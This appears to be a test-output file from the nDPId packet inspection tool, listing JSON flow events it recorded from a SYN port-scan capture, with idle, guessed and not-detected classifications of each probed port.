-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":822,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1812,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1812,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1076,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5907,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1076,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5907,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1812,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1812,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5910,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5910,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1835,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1835,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":803,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":803,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1803,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5915,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1803,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5915,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":852,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":852,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1925,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10012,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1925,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1854,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5915,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1854,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5915,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10012,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3869,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3869,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3871,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3871,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3871,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3871,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5922,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5922,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":828,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5922,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 